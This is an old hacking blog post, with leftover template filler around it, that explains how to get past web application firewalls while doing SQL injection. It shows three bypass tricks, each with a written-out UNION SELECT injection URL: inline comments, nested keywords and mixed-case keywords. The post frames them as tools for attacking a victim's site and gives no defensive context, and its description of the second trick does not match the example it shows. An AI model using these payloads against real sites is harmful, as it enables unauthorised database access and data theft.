Dear Readers: PWNSCAR is planning to publish a monthly Tech Magazine along with some other blogs. To Contribute CHECK DETAILS

This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

ITS ALL ABOUT TECHNOLOGY

You will be left behind the race if you are lacking in technology. You wont be able to survive with respect. So lets learn a bit about technology. Shall we !

ABOUT ME

Showing posts with label bypass. Show all posts
Showing posts with label bypass. Show all posts

14 Apr 2012

How to bypass http forbidden & http not acceptable in sql injection


SQL WAF :- SQL ” WAF ” is a Web Application Firewall which protects the site from malicious scripts injected by the hacker to the victims site. It don’t allow scripts to execute and shows the Error ” HTTP FORBIDDEN ” & ” HTTP NOT ACCEPTABLE ” .

So today we will learn how to bypass WAF :-

BY adding special characters to the query

Normal query :- www.vulnerable-site.com/index.php?id=-12 UNION SELECT ALL 1,2,3,4,5–

Bypass query :- www.vulnerable-site.com/index.php?id=-12 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5—

Second way to bypass it :-

By adding Capital letters at first and last :-

Normal query :- www.vulnerable-site.com/index.php?id=-12 UNION SELECT ALL 1,2,3,4,5–

Bypass query :- www.vulnerable-site.com/index.php?id=-12 UNIunionON SEselectLECT 1,2,3,4,5–

Third Way to bypass it :-

BY making the query Capital + small letters combination :-

Normal Query :- www.vulnerable-site.com/index.php?id=-12 UNION SELECT ALL 1,2,3,4,5–

Bypass query :- http://vulnerablesite.com/detail.php?id=-1 uNiOn SeLeCt 1,2,3,4,5—

Hope you have love the tutorial How to bypass WAF ;)